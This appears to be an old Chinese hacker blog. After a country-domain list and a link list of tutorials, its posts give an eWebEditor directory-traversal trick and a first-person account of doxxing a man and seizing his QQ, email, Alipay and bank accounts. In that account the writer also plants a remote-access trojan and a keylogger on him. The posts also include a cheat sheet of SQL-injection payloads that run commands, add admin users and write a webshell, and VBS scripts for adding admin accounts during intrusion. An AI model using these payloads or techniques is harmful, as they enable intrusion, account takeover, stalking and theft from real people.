.nl 荷兰
.no 挪威
.np 尼泊尔
.nr 瑙鲁
.nu 纽埃岛
.nz 新西兰

O
.om 阿曼

P
.pa 巴拿马
.pe 秘鲁
.pf 法属波利尼西亚
.pg 巴布亚新几内亚
.ph 菲律宾
.pk 巴基斯坦
.pl 波兰
.pm 圣皮埃尔岛及密客隆岛
.pn 皮特凯恩群岛
.pr 波多黎各
.ps 巴勒斯坦
.pt 葡萄牙
.pw 帕劳
.py 巴拉圭

Q
.qa 卡塔尔

R
.re 留尼汪
.ro 罗马尼亚
.ru 俄罗斯
.rw 卢旺达

S
.sa 沙特阿拉伯
.sb 所罗门群岛
.sc 塞舌尔
.sd 苏丹
.se 瑞典
.sg 新加坡
.sh 圣赫勒拿岛
.si 斯洛文尼亚
.sj 斯瓦尔巴岛和扬马延岛
.sk 斯洛伐克
.sl 塞拉利昂
.sm 圣马力诺
.sn 塞内加尔
.so 索马里
.sr 苏里南
.st 圣多美和普林西比
.sv 萨尔瓦多
.sy 叙利亚
.sz 斯威士兰

T
.tc 特克斯和凯科斯群岛
.td 乍得
.tf 法属南部领土
.tg 多哥
.th 泰国
.tj 塔吉克斯坦
.tk 托克劳
.tl 东帝汶（新域名）
.tm 土库曼斯坦
.tn 突尼斯
.to 汤加
.tp 东帝汶（旧域名，尚未停用）
.tr 土耳其
.tt 特立尼达和多巴哥
.tv 图瓦卢
.tw 台湾
.tz 坦桑尼亚

U
.ua 乌克兰
.ug 乌干达
.uk 英国
.um 美国本土外小岛屿
.us 美国
.uy 乌拉圭
.uz 乌兹别克斯坦

V
.va 梵蒂冈
.vc 圣文森特和格林纳丁斯
.ve 委内瑞拉
.vg 英属维尔京群岛
.vi 美属维尔京群岛
.vn 越南
.vu 瓦努阿图

W
.wf 瓦利斯和富图纳群岛
.ws 萨摩亚

Y
.ye 也门
.yt 马约特岛
.yu 塞尔维亚和黑山
.yr 耶纽

Z
.za 南非
.zm 赞比亚
.zw 津巴布韦

呵呵，为姐姐做的MUVEE！！！有兴趣的来看看，想做的找我，哈

Хакеры — Thu, 10 Jan 2008 00:23:54 GMT+8

50个计算机热门视频教程免费下载

Хакеры — Wed, 09 Jan 2008 13:45:14 GMT+8

01. 3ds max 8材质与贴图艺术随书光盘 http://www.it270.com/topics/0000000014/
02. 3dsmax动画技术大全动画·特效篇随书光盘 http://www.it270.com/topics/0000000015/
03. ASP数据库系统开发案例精选（光盘） http://www.it270.com/topics/0000000016/
04. Cisco CCNA视频教程20集 http://www.it270.com/topics/0000000017/
05. CorelDRAW 平面设计完全攻略随书光盘 http://www.it270.com/topics/0000000019/
06. DREAMWEAVER 8+ASP从入门到精通随书光盘 http://www.it270.com/topics/0000000020/
07. Photoshop cs2 纸制品设计范例参考随书CD http://www.it270.com/topics/0000000027/
08. Photoshop CS2金鹰Flash视频教程200讲完美版 http://www.it270.com/topics/0000000028/
09. SQL Server 2005 ETL专家系列课程 http://www.it270.com/topics/0000000031/
10. JSP动态网站开发基础练习典型案例 http://www.it270.com/topics/0000000033/
11. 编程之道—ASP数据库编程入门 http://www.it270.com/topics/0000000034/
12. 编程之道—C#程序设计入门 http://www.it270.com/topics/0000000036/
13. 编程之道—JSP数据库编程入门 http://www.it270.com/topics/0000000039/
14. 编程之道—VC.NET程序设计入门 http://www.it270.com/topics/0000000040/
15. 多媒体课堂之平面设计师必修多媒体光盘 http://www.it270.com/topics/0000000043/
16. 黑鹰基地ASP特训班教程 http://www.it270.com/topics/0000000044/
17. 黑鹰基地VB教程 http://www.it270.com/topics/0000000045/
18. 黑鹰基地Win2003系列视频教程 http://www.it270.com/topics/0000000046/
19. 即学即会 3DS Max8.0 实战特训 http://www.it270.com/topics/0000000047/
20. 浪曦视频教程ASP.NET http://www.it270.com/topics/0000000049/
21. 浪曦视频教程C# http://www.it270.com/topics/0000000050/
22. 浪曦视频教程J2EE http://www.it270.com/topics/0000000051/
23. 上海交大C++面向对象程序设计 http://www.it270.com/topics/0000000053/
24. 上海交大计算机网络 http://www.it270.com/topics/0000000055/
25. 上海交大网络安全 http://www.it270.com/topics/0000000057/
26. 网络应用深入实践 http://www.it270.com/topics/0000000062/
27. 网络狂人大全集—网站完全制作 http://www.it270.com/topics/0000000061/
28. 思达网络教育学校网络工程师多媒体视频学习课件 http://www.it270.com/topics/0000000060/
29. 美河制作上海交大最新版JAVA程序设计全 http://www.it270.com/topics/0000000058/
30. 翁恺-JAVA语言 http://www.it270.com/topics/0000000064/
31. 由尚德系列讲座之linux内核编程入门 http://www.it270.com/topics/0000000066/
32. 由尚德系列讲座之linux内核编程进阶篇 http://www.it270.com/topics/0000000067/
33. 网页设计与网站架设--CD1--Dreamweaver http://www.it270.com/topics/0000000068/
34. 网页设计与网站架设--CD2--Fireworks http://www.it270.com/topics/0000000069/
35. 网页设计与网站架设--CD3--Flash&photoshop http://www.it270.com/topics/0000000070/
36. 网页设计与网站架设--CD4--用代码设计网页 http://www.it270.com/topics/0000000071/
37. 网页设计与网站架设--CD5--ASP数据库与程序设计 http://www.it270.com/topics/0000000072/
38. 网页设计与网站架设--CD6--高效架设局域网与应用服务器 http://www.it270.com/topics/0000000073/
39. 逐步精通数据库MYSQL视频 http://www.it270.com/topics/0000000065/
40. 边学边用C语言视频14部 http://www.it270.com/topics/0000000032/
41. 浙江大学胡晓军中间件技术j2ee视频教程 http://www.it270.com/topics/0000000174/
42. 一学就会魔法书－中文flash动画制作 http://www.it270.com/topics/0000000173/
43. 《基于WEB程序设计基础》浙江大学 - 胡晓军 http://www.it270.com/topics/0000000171/
44. IT电子教育门户JAVA-web培训视频教程 http://www.it270.com/topics/0000000170/
45. Adobe InDesign CS2 中文版经典教程 http://www.it270.com/topics/0000000169/
46. 精典dos实用技术配套魔法光盘 http://www.it270.com/topics/0000000211/
47. 电脑组装完全DIY手册 http://www.it270.com/topics/0000000212/
48. 电脑原理与拆装视频教程 http://www.it270.com/topics/0000000213/
49. 电脑翻拍照片技术精粹 http://www.it270.com/topics/0000000214/
50. 磁盘阵列安装视频教程 http://www.it270.com/topics/0000000215/

ewebeditor遍历路径漏洞

Хакеры — Wed, 09 Jan 2008 12:43:52 GMT+8

ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=http://www.cnblogs.com/../.. 看到整个网站文件了

装了个英文XP，感觉不错，呵呵！

Хакеры — Wed, 09 Jan 2008 12:21:38 GMT+8

最近想提高下英语，弄了个英文XP，感觉比中文版的要好，都说原版的兼容性好，正好来测试下，附上几个截图，嘿嘿！

社会工程学在黑客中的应用－－一个密码引发的“血案”

Хакеры — Wed, 09 Jan 2008 11:14:32 GMT+8

说明：文章已发表于黑客X档案2007年第12期，转载请注明出处！
本文首发邪恶八进制.如需转载请注明出处!
PS:因为事搁很久..有些细节和证据已经无法拿出来了..所有以下有部分是根据我的回忆来陈述的..喜欢社工的朋友边看边想也许就知道我是否在编造故事了..如果你是刚入门对社工并不了解的朋友就暂且把他当成是一个小说来看好了..
事情起因
一个偶然的机会..在一次帮助朋友盗一人的QQ的时候..查到此号码是另一人所赠送..也就是她现在的男朋友..通过查看某女QQ空间的留言肯定了QQ号码为198***2就是她男朋友..当时一看跟我QQ一样是生日号..然后就看了下资料上写着"一个退休的重量级黑客".因为某女的QQ位数为5位..而他的又是生日号..又自称是黑客..开始我还不怎么相信..就想我一定要把此生日号和这个5位号弄到手..
于是就开始了对198***2的调查,当时手里刚好有我们本地一个论坛的服务器权限..而且他又是常上网之人肯定也上此论坛
就在数据库里执行
SELECT * FROM [Dv_User] where [userim] like '%198***2%'
此命令是查询QQ资料包含198***2的所有用户.得到ID两个..宁宁我本有情
得到MD5加密的密码..

http://www.cmd5.com/

解出明文密码为553***0
图1

用得到的密码登陆论坛..翻看他所有回复过的贴子还有他在论坛和别人发送的短信.也未找到任何有价值的信息
这个密码不用看就知道是电话号码..很有可能是他家里的电话..刚好我手中有电信的数据..我们本地所有家庭电话只要我知道号码就能查..输入此号码..查到结果..图2

"陈明新"很有可能是他父亲的名字..这点在之后的调查中经过证实..
我有一个习惯..无论是哪个QQ我都喜欢从交友中心来看他的资料..因为有些人缺乏安全意识..所以留的资料真实性在80%以上..但是现在直接从Q里看的话..会提示你不是高级用户...有的资料能看..有的会提示..所以我根据部分能看的抓了个包..构造出了个URL..然后根据此URL写了个小程序方便我以后的查询之用..这次也不例外
图3

照片..和生日..和一些别的信息就这么容易到手了..也再次确认了.这个QQ绝对是他的生日号.因为他所填的出生年月跟QQ的数字是一样的..因为隐私问题图片我都做了处理..也许大家会说..只根据QQ和所填生日并不能完全肯定他就是这一天出生的人..因为他资料也提到过自己是"黑客"..所以他为了掩饰自己这些资料也许是根据他的QQ来填的..这点我也怀疑过..但在后来的取证中我搞到了他的身份证号..证实了这点.
在他详细资料个人主页看到这个地址

http://b

**n.51.com/  然后打开..用查到的论坛密码尝试着去登陆...很多人都有用一个密码的习惯..而这个所谓的"重量级黑客"也不例外..登陆成功..
图4

在他相册里找到了一个非常有价值的信息.
图5

计算机四级证书..当时看到这个我还以为这家伙真的很牛..不过在后来证实他确实啥也不会..真不知道这个四级证书怎么来的..也许是办的假证.也许是别人替考得来的把..暂且不管那么多
从此证书扫描件中得到姓名"陈宁"身份证号码:342126198*****0176.这也证明了之前通过密码查询到的"陈明新"跟他很有可能就是父子关系.
在有了一次密码正确的经历之后我尝试着用553***0这个密码去登陆QQ号..很可惜的是密码错误..既然密码不对..那我就来帮他修改密码..(在我做这些的时候QQ密码找回系统跟现在是不同的..)先来找回密码看下他的密码提问是什么..问题：我叫什么？回答..我就试着写了他的名字"陈宁"提示结果已经发送至安全信箱..但信箱是多少我是不知道的..还是继续搜集资料把
根据

http://b

**n.51.com/ 的地址..又找到两个

http://b

**n**2.51.com/

http://b

**n***0.51.com/ 根据这几个网页注册的信息得到他手机号码为138567****0 小灵通0558522***5 EMAIL:c***

t@ah163.com

抱着试一试的心态用得到的密码去登陆邮箱..可惜的是密码错误..
试下找回密码把...帐号就是c***t生日我们也知道了..顺利通过..当时的提问好象是跟QQ一样的..反正我是修改掉了他的密码..现在操作一下已经被他修改回来了..图6

不过登陆进信箱后并未有看到QQ发来的确认信..
继续在baidu搜索c***

t@ah163.com

图7

根据图8返回的信息得到他所工作的单位在XX医院..联系电话为0558-51***95传真:0558-55***70

图9上的信息也证实了他确实在XX医院的管理部工作.

现在我手中已经掌握足够多的信息了..与是我就打算申诉他的QQ..大家也都知道申诉QQ是要知道他的5个之内的好友和历史密码的..历史密码我可以尝试用553***0但是好友我还没有..于是乎就在他QQ空间和QQ相册逛了一圈..选择了他留言里的几个好友..证件号码就用我之前得到的身份证号码..姓名也是用他自己的名字..只是申诉的结果发到了我的EMAIL里.. 到了晚上后进EMAIL看了下...结果已经出来了...申诉成功..当时激动了一把..赶紧修改了密码登陆他的QQ
在QQ网络硬盘里找到一些文件.. 图10

这家伙貌似还是个公安.之前查到的又是在某医院管理部..不知道他到底有多少个工作了..
通过翻看他信箱里的一些信件又找到另外一个EMAIL地址b**n5*

1@126.com

..因为是taobao发来的信件..这个EMAIL很有可能是支付宝帐户..
我来看一下关于此EMAIL的一些信息把

https://www.alipay.com/trade/i_credit.do?email=b

**n5*

1@126.com

图11

又得到真实姓名"陈宁"..那么多的证据也表明了他的真实姓名确实是叫"陈宁"了..一般我在得到某人EMAIL时总喜欢用支付宝去查下看能否得到其真实姓名..在我跟好几个好友聊天时他们都很纳闷我是如何得到他们真实姓名和生日的..相信看了本文的你以后也知道怎么去做这些了
在拿4199病毒作者来做下演示把..他的资料我也是调查了不少时间..已经在4199病毒贴吧公布了
因为性质不同所以这里图片和信息就不做处理了

https://www.alipay.com/trade/i_credit.do?email=mengqiu_xu@126.com

图12

到这里关于他的调查已经告一段落了..QQ也已经到手了..然后刚好朋友让我帮忙搞的那个5位的QQ4***3也在线..就跟她聊了起来..试图欺骗她.又赶紧做了个网页木马..做了下伪装..因为两者是恋人关系..我就说是我的爱情表白..送给她的礼物...可惜的是我有些太心急了..还没有了解她使用的什么杀毒软件..而且木马也没有做免杀处理..她来了一句有病毒..我只好说不好意思..我发错了..也许这一鲁莽的举动已经引起了她的怀疑..我就赶紧下线了..
第二天发现密码被找回去了.而且密码保护也被修改为..我喜欢谁?因为之前查到的三个51.com主页..有他写的日记..得到此女名字为"王鹃".试着找回一下..哈..运气真好..提示发送到安全信箱..可是信箱是多少还是不知道..我还是继续申诉把..到了下午..信箱收到一封腾讯的确认信..赶紧修改了密码上去..丫的资料也改了..在骂谁盗他的号...我也帮他修改了一下.."这就是你所谓的重量级黑客?"然后给QQ为4***3的又发了一个页面说这次做好了..绝对没毒..就下线了...过了一天..我又试图登陆的时候发现密码又被改了..我就又把他的号申诉了回来...就这样来回的我申诉..然后他找回..申诉成功了四次之后..我有点纳闷了...究竟他是怎么找回去那么快的...
而事情进展到此时..我那朋友跟QQ4***6也和好了..也不要求盗她号了..而我也已经玩够了..就加了QQ198***2问他是怎么那么快把QQ找回的,
这家伙就说他是腾讯技术主管..无论我怎么盗他的号都是没用的..而且还说他为腾讯远程打工..一天工资500元..我又问他在公安局是做什么的..他说自己是网警..然后我问他是怎么做的网警.他就说在2005年他入侵了我们本地电信局盗了所有的ADSL用户去刷泡泡堂点卷..使电信局损失几百万..后来的一天他自己喝多了酒投案自首了...开始我还真信了...然后我们两个做了朋友..每天就聊些技术上的事..但郁闷的事..每当我问他什么的时候他都避而不答...有时候回答的很慢..答应也不尽人意..
当时我和nowthk(可惜的是nowthk已经被抓了)两人黑了一些游戏箱子..那时候都在玩一个武林外传的游戏..刚好这个"陈宁"也在跟我玩一个区...我就告诉他我盗了好多这个区的游戏帐号..装备和钱不用愁...开始还好..我只给他一些帐号让他自己去扒..后来他生日..请我去吃饭..我也就去了..之后的几天就经常找我出来吃饭啊什么的..当面问我是怎么盗的..我就相信他把箱子的后台和密码给了他...没几天nowthk就问我..是不是我动了别的区的游戏号了..我就说我没有啊...他就说奇怪了..他合作的那个买家登陆的号都被人洗过了的..密码就我们三个人知道..于是我对他起了怀疑..问他也不承认...在加上之前讨论技术避而不答..我决定在对他进行次调查..
首先我用EST内部的一个漏洞利用做了个网马..(无敌的老婆mika写的)
图13

当时自己测试是中马的..然后用webshell登陆在箱子登陆处加了个iframe.接着他找我要登陆密码..我就给了他个假的密码...没多久后.灰鸽子提示有主机上线..他中马了.
打开灰鸽子的远程监控..这家伙还在继续猜密码..完全不知道已经被我控制了..以前一直听他吹..这次我恶搞下他..首先打开了他视频..哈.被他发现了..盯着我看..然后控制了他鼠标..没多久他就发来信息说电脑被人入侵了..我假装不知道的问他.不会把..你那么牛谁敢入侵你.他当时正好跟一个浙江的MM在聊天..就随口告诉我说浙江的..还说自己开着追踪器..谁入侵他都知道..可他完全不知道这一切都在我的监视之下并被我截了图
图14

之后我当然想见识下这么牛比的追踪器了.只见他从skynet下载了一个追踪器.下载地址为

http://users.skynet.be/submissionz03/ntp325.zip

这一切当然也逃不出灰鸽子的监控
图15

下载完毕后他把文件名修改为"追踪器.zip"之后发给了我..说自己先去WC..用监视看到他还在继续猜那个后台密码..真够辛苦的.
图16

既然这么牛比的追踪器到手了..我怎么着也得看下是什么东西把..不然也对不起这个"重量级黑客"的劳动成果啊
图17

软件的使用和介绍我就不说了.不知道的google下...
在之后的几天监视中..发现箱子里的信确实是他动的..并且在5173.com拍卖与是我启动了灰鸽子的键盘记录..

图18是鸽子记录下的
5173.com的用户名是b**n密码同样是553***0
登陆看下是否正确图19

因为我不能每天就这么监视着他..所以为了方便.我又上传了一个别的键盘记录..自动在他C盘生成个文件并保存所有的击键记录.
几天后查看击键记录发现这家伙在腾讯照片系统投简历图20

怪不得开始跟我说是腾讯技术主管..投了简历后再发给我看..图中又一次暴露了他的身份证号.

图21是他在腾讯照片系统的用户名和密码.其中138567***10是他本人的手机号(这点在第一次的调查中也已经得到)
我在此前已经得到他支付宝帐号为b**n5*

1@126.com

.那就来用那个553***0登陆下taobao看看密码对不对把

图22 登陆成功..又是这个白痴密码..它的功劳可够大的.. 用过taobao的应该都知道支付宝是跟银行帐户绑定在一起的..继续追下去没准能搞到他银行信息呢..登陆支付宝把..这个密码是不对了..可他提供了个找回密码的功能..图23

可惜这个回答不对图24

不过这个错误提示可帮了我大忙"如果您忘记了安全保护问题答案，请点击输入证件号 "
我在换一种方式找回.因为我已经知道他的身份证号码..试下看对不对把..图25  26密码找回成功并发送至信箱.

信箱密码现在是不知道的..一样用密码提示找回..这次他的提问也是我叫什么?回答.."陈宁"不对..就随手试了下"宁宁".(后来我又用这个回答试了下taobao的也一样成功)成功修改掉密码用修改掉的密码登陆信箱
图27

用信箱中的连接修改掉登陆密码..同样的方法找回支付宝支付密码图28

登陆后查看支付宝帐户信息图29 很可惜的是银行信息看不到

别忘了我们还有一个5173的没有利用..用5173卖过游戏装备的应该都知道..交易金额达到一定数目的时候,自己是可以申请提现的..在他以前提现的记录中得到他银行卡号为"9558801311******106"
下面就是要弄到他银行密码了..通过灰鸽子远程监控知道他的密码是7位的,,工行的密码必须是数字和字母组合的..这次完全是靠猜了..已经得到他那么多信息想猜出密码也不是个难事..猜解了几次之后..猜出密码为"b**n**2"...他的ID加生日. 也是他在武林外传游戏中的游戏帐号..武林外传的游戏密码也被我搞到了..不过我之前也未提到..
看看银行成功登陆后的截图把! 图30

事情到这里也算告一段落了..我们得到的有他的姓名,生日,手机,电话,工作单位,EMAIL..父亲姓名.几个51的帐号和密码..5173的帐号..支付宝..银行帐号和密码...也算是不小的收获了..
事隔很久后因为一些别的事..我两又吵了起来..这次我把我调查的结果全发给他了..估计他也挺郁闷的把..之前我一直装不知道他的底细并跟他保持距离..发给他那些截图和证据之后这家伙也无话可说了
图31  32


相信看完本文后的你一定感到非常的不可思议..其实完成整个社工过程也完全是因为其本人使用同一个密码所造成的..就因为是如此弱智的密码.所以我才那么顺利的搞到他所有的密码.当然社会工程学所带来的危害还不仅是这些..

常用的一些注入命令

Хакеры — Wed, 09 Jan 2008 11:06:46 GMT+8

//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --

数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
and user>0
' and user>0 and ''='

检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);--

检测是否支持多行
;declare @d int;--

恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--

select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
// 执行命令
//-----------------------
首先开启沙盘模式：
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ

读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1

数据库备份
backup database pubs to disk = 'c:\123.bak'

//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test：
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public

停掉或激活某个服务。

exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

将目标多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

停掉某个执行中的程序，但赋予的参数是 Process ID。
利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID

xp_terminate_process 2484

xp_unpackcab

解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1

某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

//在Master中创建表，看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

//删除内容
delete from table_name where Stockid = 3

说说这个投名状

Хакеры — Wed, 09 Jan 2008 11:00:46 GMT+8

有网友总结了十二个字：两个兄弟和一男一女的故事
这个电影看着挺伤感的，哎，没有想到李连杰演反派人物可以来的这么阴险，
嘴上总是挂着兵不厌诈，可是他还是忘了，出来混迟早要还的。
再给一个八卦报道
难道陈可辛拍《投名状》的钱都是冯小刚出的？
http://dzh.mop.com/dwdzh/topic/readSub_41_7977104_0_0.html

我在入侵渗透中用过的三则VBS代码

Хакеры — Wed, 09 Jan 2008 10:33:29 GMT+8

一、用VBS来加管理员帐号

经常看到有人在论坛上讨论，在注入过程中明明有了sa帐号，但是由于net.exe和net1.exe被限制，或其它的不明原因，总是加不了管理员帐号。VBS在活动目录（adsi）部份有一个winnt对像，可以用来管理本地资源，可以用它不依靠cmd等命令来加一个管理员，详细代码如下：

★
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os) '得到adsi接口,绑定
Set oe=GetObject(os&"/Administrators,group") '属性,admin组
Set od=ob.Create("user","lcx") '建立用户
od.SetPassword "123456" '设置密码
od.SetInfo '保存
Set of=GetObject(os&"/lcx",user) '得到用户
oe.add os&"/lcx"
★

这段代码如果保存为1.vbs，在cmd下运行，格式: ●cscript 1.vbs●的话，会在当前系统加一个名字为lcx，密码为123456的管理员。当然，你可以用记事本来修改里边的变量lcx和123456，改成你喜欢的名字和密码值。

二、用vbs来列虚拟主机的物理目录

有时旁注入侵成功一个站，拿到系统权限后，面对上百个虚拟主机，怎样才能更快的找到我们目标站的物理目录呢？一个站一个站翻看太累，用系统自带的adsutil.vbs吧又感觉好像参数很多，有点无法下手的感觉，试试我这个脚本吧，代码如下：

★
Set ObjService=GetObject("IIS://LocalHost/W3SVC")
For Each obj3w In objservice
If IsNumeric(obj3w.Name) Then
sServerName=Obj3w.ServerComment
Set webSite = GetObject("IIS://Localhost/W3SVC/" & obj3w.Name & "/Root")
ListAllWeb = ListAllWeb & obj3w.Name & String(25-Len(obj3w.Name)," ") & obj3w.ServerComment & "(" & webSite.Path & ")" & vbCrLf

End If
Next
WScript.Echo ListAllWeb
Set ObjService=Nothing
WScript.Quit
★

运行●cscript 2.vbs●后，就会详细列出IIS里的站点ID、描述、及物理目录，是不是代码少很多又方便呢？

三、快速找到内网域的主服务器

面对域结构的内网，可能许多小菜没有经验如何去渗透。如果你能拿到主域管理员的密码，整个内网你就可以自由穿行了。主域管理员一般呆在比较重要的机器上，如果能搞定其中的一台或几台，放个密码记录器之类，相信总有一天你会拿到密码。主域服务器当然是其中最重要一台了，如何在成千台机器里判断出是哪一台呢？ dos命令像●net group "domain admins" /domain●可以做为一个判断的标准，不过vbs也可以做到的，这仍然属于adsi部份的内容，代码如下：

★
set obj=GetObject("LDAP://rootDSE")
wscript.echo obj.servername
★

只用这两句代码就足够了，运行●cscript 3.vbs●，会有结果的。当然，无论是dos命令或vbs，你前提必须要在域用户的权限下。好比你得到了一个域用户的帐号密码，你可以用 psexec.exe -u -p cmd.exe这样的格式来得到域用户的shell，或你的木马本来就是与桌面交互的，登陆你木马shell的又是域用户，就可以直接运行这些命令了。

vbs的在入侵中的作用当然不只这些，当然用js或其它工具也可以实现我上述代码的功能；不过这个专栏定下的题目是vbs在hacking中的妙用，所以我们只提vbs。写完vbs这部份我和其它作者会在以后的专栏继续策划其它的题目，争取为读者带来好的有用的文章。